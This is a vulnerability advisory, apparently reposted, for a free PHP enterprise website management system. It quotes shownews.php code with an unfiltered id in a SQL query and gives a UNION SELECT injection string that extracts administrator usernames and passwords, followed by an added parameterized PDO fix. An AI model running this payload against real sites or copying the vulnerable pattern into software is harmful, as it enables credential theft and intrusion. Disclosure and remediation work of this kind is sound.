V2.0 shownews.php Injection Vulnerability in PHP Enterprise website management System

Source: Internet
Author: User

Program name: Network PHP Enterprise website Management System 2.0 free version

The following is a brief description of the system's features:

1. Uses a DIV+CSS layout, tested as compatible with the mainstream browsers IE and Firefox; other browsers have not been tested.

2. Three-level unlimited classification for products and news.

3. The back end can set information such as the administrator account password, the site title, and the copyright notice at the bottom of the site.

4. The back end uses the latest version of the xhEditor editor; xhEditor is a cross-platform, open-source mini XHTML editor component built on jQuery.

5. The back-end image section can modify the settings for slides, links, logo, banner, etc.

6. The back end can delete products and news in bulk.

Vulnerable file: shownews.php. Here is the relevant section of the program code:

<?php
include_once("wzdy.php");
if (isset($_GET['id'])) // check whether the id variable is set
{
    $id = $_GET["id"];
}
else
{
    echo "<script language='JavaScript'>";
    echo "alert('Please enter the correct id!');";
    echo "location='index.php';";
    echo "</script>";
    exit;
}
$sql4 = "SELECT * FROM news where id=$id"; // the unfiltered id variable is placed directly into the SQL query string, which is stored in $sql4
$result4 = mysql_query($sql4); // execute the query in $sql4 and assign the result to $result4
if ($nums = mysql_num_rows($result4)) // rows are returned from $result4, which means the $title and $content variables show the result of the maliciously injected statement we constructed
{
    $rs4 = mysql_fetch_array($result4);
    $title = $rs4["title"];
    $content = $rs4["content"];
    $hits = $rs4["hits"];
    $fbsj = date("Y-m-d", strtotime($rs4['fbsj']));
    $sql = "Update news set hits=hits+1 where id=$id";
    mysql_query($sql);
}
else
{
    echo "<script language='JavaScript'>";
    echo "alert('Please enter the correct id!');";
    echo "location='index.php';";
    echo "</script>";
    exit;
}
?>

Vulnerability Exp:

Http:// and 1=2 UNION SELECT 1,2,unhex (Hex (concat (0x5e5e5e, username,0x7c,password,0x5e5e5e)), 4,5,6,7 from gly
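
A hardened form of the shownews.php lookup, as an added example that is not part of the original advisory or the vendor's code: the id is validated as a positive integer and then passed as a bound parameter instead of being concatenated into the SQL string. The function names, the PDO handle, and the in-memory SQLite table with constructed rows are assumptions standing in for the application's MySQL "news" table.

```php
<?php
// Added example: validated, parameterized replacement for the shownews.php query.
// Assumption: the application can use PDO; an in-memory SQLite database with a
// constructed row stands in for the real MySQL "news" table.

function open_demo_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, content TEXT, hits INTEGER, fbsj TEXT)');
    $pdo->exec("INSERT INTO news VALUES (1, 'Constructed title', 'Constructed body', 0, '2020-01-02 03:04:05')");
    return $pdo;
}

// Returns the news row for a raw request parameter, or null when the id is
// missing, is not a positive integer, or matches no row.
function fetch_news(PDO $pdo, $rawId): ?array
{
    // 1. Validate: accept only a plain positive integer.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // 2. Bind: the value travels as a typed parameter, never as SQL text.
    $stmt = $pdo->prepare('SELECT title, content, hits, fbsj FROM news WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return null;
    }

    // The hit counter update uses the same bound id.
    $upd = $pdo->prepare('UPDATE news SET hits = hits + 1 WHERE id = :id');
    $upd->bindValue(':id', $id, PDO::PARAM_INT);
    $upd->execute();
    return $row;
}

$pdo = open_demo_db();
// Constructed inputs: a valid id, a non-numeric id, and an id followed by extra SQL text.
foreach (['1', 'abc', '1 and 1=2'] as $input) {
    $row = fetch_news($pdo, $input);
    echo str_pad(var_export($input, true), 14), ' => ',
        $row === null ? 'rejected' : htmlspecialchars($row['title'], ENT_QUOTES, 'UTF-8'), PHP_EOL;
}
```

With the MySQL PDO driver, also set PDO::ATTR_EMULATE_PREPARES to false so that the server performs the parameter binding.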
